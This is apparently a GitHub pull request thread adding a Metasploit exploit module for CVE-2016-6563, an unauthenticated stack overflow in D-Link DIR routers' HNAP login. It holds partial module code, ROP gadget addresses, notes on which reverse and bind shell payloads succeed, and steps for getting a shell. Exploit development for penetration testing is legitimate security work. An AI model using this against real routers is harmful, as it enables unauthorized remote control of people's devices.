### PR TITLE
Create exploit for CVE-2016-6563 / Dlink DIR HNAP Login bof

### PR DESCRIPTION
**Pull request by pedrib**
Several Dlink routers contain a pre-authentication stack buffer overflow vulnerability, which is exposed on the LAN interface on port 80. This vulnerability affects the HNAP SOAP protocol, which accepts arbitrarily long strings into certain XML parameters and then copies them into the stack. 
This exploit has been tested on the real devices DIR-818LW and 868L (rev. B), and it was tested using emulation on the DIR-822, 823, 880, 885, 890 and 895. Others might be affected, and this vulnerability is present in both MIPS and ARM devices.
The MIPS devices are powered by Lextra RLX processors, which are crippled MIPS cores lacking a few load and store instructions. Because of this the payloads have to be sent unencoded, which can cause them to fail, although the bind shell seems to work well.
For the ARM devices, the inline reverse tcp seems to work best.
Check the reference links to see the vulnerable firmware versions.

## Verification

I've included the payload status as a comment above, feel free to remove it. On the MIPS versions, the payloads that can be sent with null bytes work well. No encoder can be used for these ones, as the encoder relies in MIPS instructions that the router CPU does not support. So in practice, only really the bind shell and the command payloads work.
As for the ARM payloads, they are tricky. I had many conversations on IRC with some of the devs, and only the inline payloads work well. The others fail constantly.
Please note that these are the tests done on real devices (818 and 868). In qemu most payloads work well.

How to test:
- Connect to the wireless LAN
- Choose the correct target (ARM or MIPS, according to the router model)
- Choose a good payload (inline preferably)
- Fire and get a shell!

A pcap is attached for a test on the qemu emulated 823 model.

[hnap-823-revshell.pcap.zip](https://github.com/rapid7/metasploit-framework/files/576183/hnap-823-revshell.pcap.zip)

### CODE REVIEW

**Comment by pedrib** [comment]
Something weird with the checks, it seems to be failing because of something unrelated with this module?

**Comment by wvu-r7** [comment]
Taking a look.

**Comment by wvu-r7** [comment]
Unrelated.

File: modules/exploits/linux/http/dlink_hnap_login_bof.rb [hunk 1]
```diff
@@ -0,0 +1,300 @@
...
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow ',
```
Comment (h00die) [inline modules/exploits/linux/http/dlink_hnap_login_bof.rb]: trailing space in name

File: modules/exploits/linux/http/dlink_hnap_login_bof.rb [hunk 2]
```diff
@@ -0,0 +1,300 @@
...
+      'DisclosureDate'  => 'Nov 7 2016',
+      'DefaultTarget'   => 0))
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('SLEEP', [true, 'Seconds to sleep between requests (ARM only)', '0.5']),
+        OptString.new('SRVHOST', [true, 'IP address for the HTTP server (ARM only)', '0.0.0.0']),
+        OptString.new('SRVPORT', [true, 'Port for the HTTP server (ARM only)', '3333']),
+        OptString.new('SHELL', [true, 'Don\'t change this', '/bin/sh']),
+        OptString.new('SHELLARG', [true, 'Don\'t change this', 'sh']),
```
Comment (h00die) [inline modules/exploits/linux/http/dlink_hnap_login_bof.rb]: if this says not to change it, should it even be an option?  Maybe a hardcoded variable, or an advanced option?  I like moving it to being an advanced option (you can make those... right?)

**Comment by pedrib** [comment]
This is a fix up for the ARM shell payloads. They set those variables to
something Android specific by default (/system/bin/sh), and this fix up is
needed to make them work on Linux.

On 13 Nov 2016 2:13 a.m., "h00die" <notifications@github.com> wrote:

*@h00die* commented on this pull request.
------------------------------

In modules/exploits/linux/http/dlink_hnap_login_bof.rb
<https://github.com/rapid7/metasploit-framework/pull/7543#pullrequestreview-8307993>
:

> +# ARM:
+#  - inline rev/bind shell works (bind... meh sometimes)
+#  - stager rev/bind shell FAIL
+#  - mettle rev/bind fails with sigsegv standalone, but works under
strace or gdb...
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Dlink DIR Routers Unauthenticated HNAP
Login Stack Buffer Overflow ',

trailing space in name
------------------------------

In modules/exploits/linux/http/dlink_hnap_login_bof.rb
<https://github.com/rapid7/metasploit-framework/pull/7543#pullrequestreview-8307993>
:

> +              'FirstGadget'    => 0x18298,            # see comments below for gadget information
+              'SecondGadget'   => 0x40CB8,
+              'Arch'           => ARCH_ARMLE,
+            }
+          ],
+        ],
+      'DisclosureDate'  => 'Nov 7 2016',
+      'DefaultTarget'   => 0))
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('SLEEP', [true, 'Seconds to sleep between
requests (ARM only)', '0.5']),
+        OptString.new('SRVHOST', [true, 'IP address for the HTTP
server (ARM only)', '0.0.0.0']),
+        OptString.new('SRVPORT', [true, 'Port for the HTTP server
(ARM only)', '3333']),
+        OptString.new('SHELL', [true, 'Don\'t change this', '/bin/sh']),
+        OptString.new('SHELLARG', [true, 'Don\'t change this', 'sh']),

if this says not to change it, should it even be an option? Maybe a
hardcoded variable, or an advanced option? I like moving it to being an
advanced option (you can make those... right?)

—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub
<https://github.com/rapid7/metasploit-framework/pull/7543#pullrequestreview-8307993>,
or mute the thread

**Comment by wwebb-r7** [comment]
### Release Notes

This merge adds an exploit for the vulnerability described by CVE-2016-6563 which is present on numerous D-Link products.

**Pull request merged**